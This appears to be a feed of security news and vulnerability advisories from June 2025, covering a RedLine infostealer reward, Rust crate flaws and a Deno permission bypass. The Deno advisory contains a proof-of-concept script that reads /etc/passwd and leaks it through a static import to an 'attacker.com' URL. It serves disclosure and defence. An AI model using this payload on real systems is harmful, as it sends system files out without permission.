June 5th, 2025 (3 days ago)
Description: The U.S. Department of State has announced a reward of up to $10 million for any information on government-sponsored hackers with ties to the RedLine infostealer malware operation and its suspected creator, Russian national Maxim Alexandrovich Rudometov. [...]
June 5th, 2025 (3 days ago)
Description: The United Nations, Carnegie Mellon University, and private organizations are all aiming to train the next generation of cybersecurity experts, boost economies, and disrupt pipelines to armed groups.
June 5th, 2025 (3 days ago)
Description: For The Council Of LTS Group We have breached your main system Lts.com.vn LTS LAW, a key component of LTS [...]
June 5th, 2025 (3 days ago)
Description: The following functions in the anon-vec crate are unsound due to insufficient checks on their arguments:
- AnonVec::get_ref()
- AnonVec::get_mut()
- AnonVec::remove_get()
The crate was built as a learning project and is not being maintained.
References
https://github.com/RylanYancey/anon-vec
https://rustsec.org/advisories/RUSTSEC-2025-0039.html
https://github.com/advisories/GHSA-pr59-jjr4-gcf6
June 5th, 2025 (3 days ago)
Description: Affected versions append root to group listings, unless the correct listing has exactly 1024 groups.
This affects both:
- The supplementary groups of a user
- The group access list of the current process
If the caller uses this information for access control, this may lead to privilege escalation.
This crate is not currently maintained, so a patched version is not available.
Versions older than 0.8.0 do not contain the affected functions, so downgrading to them is a workaround.
Recommended alternatives:
- uzers (an actively maintained fork of the users crate)
- sysinfo
References
https://github.com/ogham/rust-users/issues/44
https://rustsec.org/advisories/RUSTSEC-2025-0040.html
https://github.com/advisories/GHSA-m65q-v92h-cm7q
June 5th, 2025 (3 days ago)
Description: Summary
Static imports are exempted from the network permission check. An attacker could exploit this to leak the password file on the network.
Details
Static imports in Deno are exempted from the network permission check. This can be exploited by attackers in multiple ways when third-party code is directly or indirectly executed with deno run:
- The simplest payload would be a tracking-pixel-like import that attackers place in their code to find out when developers use the attacker-controlled code.
- When --allow-write and --allow-read permissions are given, an attacker can perform a more sophisticated two-step attack: first, they generate a ts/js file containing a static import, and in a second execution load this static file.
PoC
```js
const __filename = new URL("", import.meta.url).pathname;
let oldContent = await Deno.readTextFile(__filename);
let passFile = await Deno.readTextFile("/etc/passwd");
let pre =
  'import {foo} from "https://attacker.com?val=' +
  encodeURIComponent(passFile) + '";\n';
await Deno.writeTextFile(__filename, pre + oldContent);
```
Executing a file containing this payload twice with deno run --allow-read --allow-write would cause the password file to leak on the network, even though no network permission was granted.
This vulnerability was fixed with the addition of the --allow-import flag: https://docs.deno.com/runtime/fundamentals/security/#network-access
References
https://github.com/denoland/deno/security/advisories/GHSA-jv4x...
June 5th, 2025 (3 days ago)
Description: The FTC's Andrew Ferguson called on Congress to update federal law to get rid of exceptions for tech firms that handle children's data.
June 5th, 2025 (3 days ago)